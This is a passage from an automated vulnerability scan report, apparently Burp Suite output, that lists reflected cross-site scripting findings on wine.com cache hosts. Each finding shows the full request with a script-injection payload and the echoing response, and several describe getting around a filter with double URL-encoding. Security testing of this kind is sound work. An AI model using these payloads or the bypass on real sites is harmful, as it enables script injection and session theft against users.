Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/106551m.jpg?Lo0P=d543d<script>alert(1)</script>111e9e0bcf8 was not found on this server.<P>
...[SNIP]...

1.41. http://cache.wine.com/labels/107565m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/107565m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9baf9<script>alert(1)</script>9405d4a9832 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/107565m.jpg?Lo0P=9baf9<script>alert(1)</script>9405d4a9832 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/107565m.jpg?Lo0P=9baf9<script>alert(1)</script>9405d4a9832 was not found on this server.<P>
...[SNIP]...

1.42. http://cache.wine.com/labels/108103m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/108103m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload ecec6<script>alert(1)</script>f92b23f7eab was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108103m.jpg?Lo0P=ecec6<script>alert(1)</script>f92b23f7eab HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108103m.jpg?Lo0P=ecec6<script>alert(1)</script>f92b23f7eab was not found on this server.<P>
...[SNIP]...

1.43. http://cache.wine.com/labels/108138m.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /labels/108138m.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 2452f<script>alert(1)</script>e82d9de1399 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /labels/108138m.jpg?Lo0P=2452f<script>alert(1)</script>e82d9de1399 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /labels/108138m.jpg?Lo0P=2452f<script>alert(1)</script>e82d9de1399 was not found on this server.<P>
...[SNIP]...

1.44. http://cache1.wine.com/ScriptResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e242cce2072a was submitted in the REST URL parameter 1. This input was echoed as 39cdc"><script>alert(1)</script>242cce2072a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ScriptResource.axd39cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e242cce2072a?d=rQ8zHodK4rGVH28jFFCruwhcCtLwiw_HPB4d-VJMNGHuIHOF6FgLMj5O7Ur-6UVWpVfuG8jt-M851ZvndxTa-1l0qjqQTDZj3PDDOTRd6AE1&t=16ab2387 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:16:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:16:04 GMT; path=/
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Tue, 14-Feb-2012 17:16:04 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDASQBSASS=JBEBLMIAAGNBIJCDHNBIAJIB; path=/
Content-Length: 33605


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/ScriptResource.axd39cdc"><script>alert(1)</script>242cce2072a?d" value="rQ8zHodK4rGVH28jFFCruwhcCtLwiw%5FHPB4d%2DVJMNGHuIHOF6FgLMj5O7Ur%2D6UVWpVfuG8jt%2DM851ZvndxTa%2D1l0qjqQTDZj3PDDOTRd6AE1" />
...[SNIP]...

1.45. http://cache1.wine.com/WebResource.axd [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7817ffae689 was submitted in the REST URL parameter 1. This input was echoed as 4e2c8"><script>alert(1)</script>7817ffae689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /WebResource.axd4e2c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7817ffae689?d=Hv6DbdWs2sIIjykzJEbGPQ2&t=634118940264276101 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:16:04 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:16:04 GMT; path=/
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Tue, 14-Feb-2012 17:16:04 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDASQBSASS=GBEBLMIAIKKFHEEHLDFBOLNL; path=/
Content-Length: 33517


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/WebResource.axd4e2c8"><script>alert(1)</script>7817ffae689?d" value="Hv6DbdWs2sIIjykzJEbGPQ2" />
...[SNIP]...

1.46. http://cache1.wine.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1219%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ca90fa5de6 was submitted in the REST URL parameter 1. This input was echoed as d1219"><script>alert(1)</script>0ca90fa5de6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod1219%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Sun, 13 Feb 2011 14:59:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; expires=Mon, 13-Feb-2012 14:59:54 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; path=/
Content-Length: 33266


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache1.wine.com:80/favicon.icod1219"><script>alert(1)</script>0ca90fa5de6" value="" />
...[SNIP]...

1.47. http://cache1.wine.com/images/90PointRatedWineClub.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/90PointRatedWineClub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 18d8b<script>alert(1)</script>4390c83485c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/90PointRatedWineClub.jpg?Lo0P=18d8b<script>alert(1)</script>4390c83485c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 267
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/90PointRatedWineClub.jpg?Lo0P=18d8b<script>alert(1)</script>4390c83485c was not found on this server.<P>
...[SNIP]...

1.48. http://cache1.wine.com/images/WorldWineClub.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/WorldWineClub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e4ea9<script>alert(1)</script>0617d3f267a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/WorldWineClub.jpg?Lo0P=e4ea9<script>alert(1)</script>0617d3f267a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 260
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/WorldWineClub.jpg?Lo0P=e4ea9<script>alert(1)</script>0617d3f267a was not found on this server.<P>
...[SNIP]...

1.49. http://cache1.wine.com/images/btnSearch.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/btnSearch.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload ba594<script>alert(1)</script>290a086d246 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnSearch.gif?Lo0P=ba594<script>alert(1)</script>290a086d246 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Sun, 13 Feb 2011 13:56:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnSearch.gif?Lo0P=ba594<script>alert(1)</script>290a086d246 was not found on this server.<P>
...[SNIP]...

1.50. http://cache1.wine.com/images/css/homeNavBot.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavBot.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a1cb5<script>alert(1)</script>21314e1a19f was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavBot.gif?Lo0P=a1cb5<script>alert(1)</script>21314e1a19f HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavBot.gif?Lo0P=a1cb5<script>alert(1)</script>21314e1a19f was not found on this server.<P>
...[SNIP]...

1.51. http://cache1.wine.com/images/css/homeNavBotDark.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavBotDark.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c725e<script>alert(1)</script>b0296818725 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavBotDark.gif?Lo0P=c725e<script>alert(1)</script>b0296818725 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavBotDark.gif?Lo0P=c725e<script>alert(1)</script>b0296818725 was not found on this server.<P>
...[SNIP]...

1.52. http://cache1.wine.com/images/css/homeNavRtArrow.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavRtArrow.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9cd12<script>alert(1)</script>cee0b6c74f6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavRtArrow.jpg?Lo0P=9cd12<script>alert(1)</script>cee0b6c74f6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

